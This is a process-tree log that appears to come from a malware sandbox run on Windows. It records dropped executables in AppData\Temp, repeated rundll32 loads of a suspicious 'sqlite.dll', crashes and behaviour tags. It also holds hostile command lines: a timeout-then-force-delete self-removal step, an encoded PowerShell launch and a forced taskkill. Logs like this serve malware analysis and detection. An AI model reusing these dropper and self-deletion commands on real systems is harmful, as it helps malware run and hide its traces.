C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 10847⤵
- Program crash
PID:5600
-
-
-
C:\Users\Admin\AppData\Roaming\4815971.scr"C:\Users\Admin\AppData\Roaming\4815971.scr" /S6⤵PID:4868
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 716 -ip 7161⤵PID:2344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 784 -ip 7841⤵PID:5816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:5660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 916 -ip 9161⤵PID:5568
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5384 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 4563⤵
- Program crash
PID:2932
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6132 -ip 61321⤵PID:1564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1472 -ip 14721⤵PID:4108
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5884 -ip 58841⤵PID:5396
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 548 -p 2928 -ip 29281⤵PID:4780
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 496 -p 3880 -ip 38801⤵PID:3840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4952 -ip 49521⤵PID:2860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6004 -ip 60041⤵PID:5172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5512 -ip 55121⤵PID:1540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5204 -ip 52041⤵PID:1404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1616 -ip 16161⤵PID:6096
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:4208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 2648 -ip 26481⤵PID:5012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4940 -ip 49401⤵PID:2832
-
C:\Users\Admin\AppData\Local\Temp\8AE7.exeC:\Users\Admin\AppData\Local\Temp\8AE7.exe1⤵PID:5788
-
C:\Users\Admin\AppData\Local\Temp\8AE7.exeC:\Users\Admin\AppData\Local\Temp\8AE7.exe2⤵PID:5724
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4524 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3168
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 4523⤵
- Program crash
PID:6076
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 4523⤵
- Program crash
PID:4448
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3168 -ip 31681⤵PID:5160
-
C:\Users\Admin\AppData\Local\Temp\DEF3.exeC:\Users\Admin\AppData\Local\Temp\DEF3.exe1⤵PID:3808
-
C:\Users\Admin\AppData\Local\Temp\DEF3.exeC:\Users\Admin\AppData\Local\Temp\DEF3.exe2⤵PID:4168
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 2392 -ip 23921⤵PID:7008
-
C:\Users\Admin\AppData\Local\Temp\8F78.exeC:\Users\Admin\AppData\Local\Temp\8F78.exe1⤵PID:7056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3480 -ip 34801⤵PID:3168
-
C:\Users\Admin\AppData\Local\Temp\AE3.exeC:\Users\Admin\AppData\Local\Temp\AE3.exe1⤵PID:4456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4456 -s 2602⤵
- Program crash
PID:7152
-
-
C:\Users\Admin\AppData\Local\Temp\2FF0.exeC:\Users\Admin\AppData\Local\Temp\2FF0.exe1⤵PID:6636
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6636 -s 16882⤵
- Program crash
PID:408
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 660 -p 6636 -ip 66361⤵PID:844
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4456 -ip 44561⤵PID:6160
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:5792
-
C:\Users\Admin\AppData\Local\Temp\C74F.exeC:\Users\Admin\AppData\Local\Temp\C74F.exe1⤵PID:1716
-
C:\Users\Admin\AppData\Local\Temp\41CF.exeC:\Users\Admin\AppData\Local\Temp\41CF.exe1⤵PID:1280
-
C:\Users\Admin\AppData\Local\Temp\5335.exeC:\Users\Admin\AppData\Local\Temp\5335.exe1⤵PID:956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 2762⤵
- Program crash
PID:5764
-
-
C:\Users\Admin\AppData\Local\Temp\6CD9.exeC:\Users\Admin\AppData\Local\Temp\6CD9.exe1⤵PID:5748
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\6CD9.exe"2⤵PID:7120
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:1920
-
-
-
C:\Users\Admin\AppData\Local\Temp\7AF3.exeC:\Users\Admin\AppData\Local\Temp\7AF3.exe1⤵PID:6360
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==2⤵PID:6204
-
-
C:\Users\Admin\AppData\Local\Temp\7AF3.exeC:\Users\Admin\AppData\Local\Temp\7AF3.exe2⤵PID:4780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 956 -ip 9561⤵PID:4000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3996
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:5660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6396 -ip 63961⤵PID:5520
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:6808
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 45D40769AE8A8F0A2514ECDC8F58C4FE C2⤵PID:1528
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EB215A74F437FD5D7725EF1FD5A20E4E2⤵PID:1312
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:7024
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E1841DBF4A5AE1CF3ED0E1373A487CCA E Global\MSI00002⤵PID:6736
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6700 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 4243⤵
- Program crash
PID:6612
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1464 -ip 14641⤵PID:6016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3200 -ip 32001⤵PID:6736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:6484